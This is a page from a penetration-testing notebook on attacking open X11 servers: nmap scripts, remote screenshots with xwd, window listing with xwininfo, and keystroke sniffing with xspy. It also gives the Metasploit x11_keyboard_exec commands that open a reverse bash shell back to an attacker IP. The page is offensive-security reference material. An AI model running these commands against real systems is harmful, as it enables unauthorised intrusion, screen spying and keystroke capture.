Infrastructure penetration testing notes
  • Initial page
  • Table Of Content
  • Infrastructure testing
    • Enumeration
      • Packet Capture
      • Host Discovery
      • Services / Ports
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 53 - DNS
        • 67 - DHCP
        • 69 - TFTP
        • 79 - Finger
        • 88 - Kerberos
        • 111 - RPC
        • 113 - ident
        • 135 - MSRPC
        • 137 - Netbios
        • 139/445 - SMB
        • 161 - SNMP
        • 177 - XDMCP
        • 363 - LDAP
        • 443 - HTTPS
        • 500 - IKE (IPSEC)
        • 512/513/514 - R Services
        • 623 - IPMI
        • 873 - RSYNC
        • 1099 - Java RMI
        • 1433 - Microsoft SQL
        • 1521 - Oracle DB
        • 2049 - NFS
        • 3306 - MySQL
        • 3389 - RDP
        • 5432 - PostgresSQL
        • 5900 - VNC
        • 5985 - WinRM
        • 6000 - X11
        • 6379 - Redis
        • 8080 - Jenkins
        • 11211 - Memcached
        • RDS
        • SQLite
        • Docker
      • IPV6
        • Scanning
        • Enumeration
        • Transfering files
        • Pivoting and routes
        • THC IPv6
    • Gaining Access
      • IP Forwarding
      • VLAN Information
      • Psexec
      • Upgrading shell
      • Reverse Shells One-Liners
      • Bruteforce
      • MITM cleartext protocols
      • Null session
      • LLMNR / NBT NS Spoofing
      • Port knocking
      • Downloading/Transfer files
      • Remote Desktop
      • NAC Bypass
      • Pass-The-Hash
    • Exploitation
      • Solaris
      • IPv6
      • Windows
        • Compiling Code
        • SMB Vulnerabilities
        • Kerberos Attacks
    • Privilege Escalation
      • Situational Awareness
        • Linux
        • Windows
          • Registry
          • PowerView
          • FSMO Roles
      • Windows
        • Disable Apps and Firewall
        • Add user script
        • UAC Bypass
        • icacls
        • Running services
        • Common Exploits
      • Linux
        • SUID Shell script
        • CVE-2019-14287
        • Kernel exploit
      • Solaris
      • FreeBSD
      • Automated tools
      • Metasploit Modules
      • Password Dumping
    • Breakout
      • LOLBas
      • powershell constrained language byass
      • Alternatives to command prompt
      • Windows utilities
      • Applocker
      • Restricted shells
      • Environmental Variables / Bypassing Path Restrictions
      • Docker escape
      • Just Enough Administration (JEA)
    • Presistance
      • Windows
    • Pivoting
      • Adding routes
    • Password Cracking
      • Hashcat
      • John
      • Cisco Passwords
      • Passwords Lists
      • Generating wordlist
    • Tools
      • Nishang
      • UACME
      • Bypass-UAC
      • MSBuildAPICaller
      • Impacket
      • SharpPersist
      • Terminals
      • IP Calculation
      • pwsh
      • psTools / Sysinternals
      • Unlock applocker
      • enum4linux
      • Bloodhound
        • aclpwn
      • mitm6
      • Enyx
      • nfsshell
      • PowerUpSQL
      • Metasploit
        • msfvenom
    • Others
Powered by GitBook
On this page
  • Nmap
  • Sensepost created the following nmap script
  • Metasploit
  • Connect to X11 server
  • Taking screenshot
  • xwd
  • xrdp
  • Gaining remote shell
  • Gather information on the windows open
  • Capture keystrokes

Was this helpful?

  1. Infrastructure testing
  2. Enumeration
  3. Services / Ports

6000 - X11

The X Window System (X11, or simply X) is a windowing system for bitmap displays, common on Unix-like operating systems. X provides the basic framework for a GUI environment.

Previous5985 - WinRMNext6379 - Redis

Last updated 4 years ago

Was this helpful?

Nmap

Script:

x11-access.nse

Host script results: |_ x11-access: X server access is granted

Sensepost created the following nmap script

Usage

nmap -p6000 <host> --script x11-active-displays.nse
nmap -p6000 <host> --script x11-active-displays.nse --script-args=unsafe=1,dir="/home/<username>/Documents/"

Output

Host script results:
| x11-active-displays: X server access is granted
|     Active display
|_    Screenshot saved to /tmp/<ip>:<dp>.jpg
Host script results:
| x11-active-displays: X server access is granted
|_    No active display

Metasploit

X11 No-Auth Scanner - Module scans for X11 servers that allow anyone to connect without authentication.

auxiliary/scanner/x11/open_x11

Connect to X11 server

Xorg:

sudo Xorg -terminate -query $REMOTE_HOST :1

Using X:

X :1 -query s390vm.example.com

  • To exit press 'ctrl+alt+enter'

To enable XDMCP in Remmina run the following:

sudo apt-get install remmina-plugin-xdmcp

Taking screenshot

xwd

XWD It is an X Window System utility that helps in taking screenshots. On our Kali System, we will use the xwd to take the screenshot of Xserver. This utility takes the screenshots in xwd format.

To take a screenshot run:

xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd

Here we have the screenshot captured by the xwd, but it is in .xwd format, so to view it we will have to convert it to a viewable format like .png

Note: You may need to install imagemagick to convert to png, convert is not pre installed on kali

convert screenshot.xwd screenshot.png

On opening the png file we can see that the xwd tool has successfully captured the screenshot of the target system.

xrdp 

iron@kali2:/opt/xrdp$ python xrdp.py 192.168.0.62:0 
              _        
__  ___ __ __| |_ __   
\ \/ / '__/ _` | '_ \  
 >  <| | | (_| | |_) | 
/_/\_\_|  \__,_| .__/  
               |_|     
X11 Remote Desktop 
xrdp.py <host>:<dp> 
------------------------ 
Example: 
xrdp.py 10.0.0.10:0 
xrdp.py 10.0.0.10:0 --no-disp

Gaining remote shell

we will use the X11 Keyboard Command Injection module of the Metasploit Framework. This module exploits open X11 Server by connecting and registering a virtual keyboard. Then the Virtual Keyboard is used to open an xterm or gnome-terminal and then type and execute the payload.

NOTE: As X Server is a visual service, while the executing of the module will take place, every task occurring on the Target System will be visible to the Victim.

Now, after opening the Metasploit Framework, we will use the payload as shown:

use unix/x11/x11_keyboard_exec 
msf exploit(unix/x11x11_keyboard_exec) > set rhost 192.168.1.109 
msf exploit(unix/x11x11_keyboard_exec) > set payload cmd/unix/reverse_bash 
msf exploit(unix/x11x11_keyboard_exec) > set lhost 192.168.1.120 
msf exploit(unix/x11x11_keyboard_exec) > set lport 4444 
msf exploit(unix/x11x11_keyboard_exec) > set time_wait 10 
msf exploit(unix/x11x11_keyboard_exec) >  run

After running the module, it will first connect to the Server and search for xterm and open it. Then after waiting for 10 seconds as its the wait time we gave earlier, it will start typing the script command on the xterm, After executing this command, xterm will get closed, but it will provide a command shell to the Attacker.

Gather information on the windows open

XWININFO - This is the built-in utility in Kali, it shows the window’s information for X Service. xwininfo can be used to get information about the windows opened on the target system.

xwininfo -root -tree -display 192.168.1.109:0

  • Root = specifies that X’s root window is the target window

  • Tree = displays the names of the windows

  • Display = specify the server to connect to

We can extract much information from the screenshot like:

  • The victim has Gnome Terminal Opened

  • The victim is a VMware user

  • The victim has Nautilus (Ubuntu File Browser) Opened

Capture keystrokes

XSPY It is a built-in tool Kali Linux for the X Window Servers. XSPY is a sniffer, it sniffs keystrokes on the remote or local X Server.

https://github.com/sensepost/x11-active-displays